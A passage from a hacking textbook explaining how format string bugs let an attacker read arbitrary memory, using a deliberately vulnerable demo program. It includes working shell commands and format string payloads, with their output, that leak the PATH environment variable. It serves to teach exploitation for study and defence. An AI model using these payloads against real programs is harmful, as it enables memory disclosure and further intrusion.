Graphics Programs Reference
In-Depth Information
0x353
Reading from Arbitrary Memory Addresses
The
%s
format parameter can be used to read from arbitrary memory addresses.
Since it's possible to read the data of the original format string, part of the
original format string can be used to supply an address to the
%s
format
parameter, as shown here:
reader@hacking:~/booksrc $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x
The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAAbffff3d0.b7fe75fc.00000000.41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
r
eader@hacking:~/booksrc $
The four bytes of
0x41
indicate that the fourth format parameter is
reading from the beginning of the format string to get its data. If the fourth
format parameter is
%s
instead of
%x
, the format function will attempt to print
the string located at
0x41414141
. This will cause the program to crash in a seg-
mentation fault, since this isn't a valid address. But if a valid memory address
is used, this process could be used to read a string found at that memory
address.
reader@hacking:~/booksrc $ env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
reader@hacking:~/booksrc $ ./getenvaddr PATH ./fmt_vuln
PATH will be at 0xbffffdd7
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s
The right way to print user-controlled input:
????%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/
usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
r
eader@hacking:~/booksrc $
Here the
getenvaddr
program is used to get the address for the environ-
ment variable
PATH
. Since the program name
fmt_vuln
is two bytes less than
getenvaddr
, four is added to the address, and the bytes are reversed due to the
byte ordering. The fourth format parameter of
%s
reads from the beginning
of the format string, thinking it's the address that was passed as a function
argument. Since this address is the address of the
PATH
environment variable,
it is printed as if a pointer to the environment variable were passed to
printf()
.
Now that the distance between the end of the stack frame and the begin-
ning of the format string memory is known, the field-width arguments can be
omitted in the
%x
format parameters. These format parameters are only needed
to step through memory. Using this technique, any memory address can be
examined as a string.
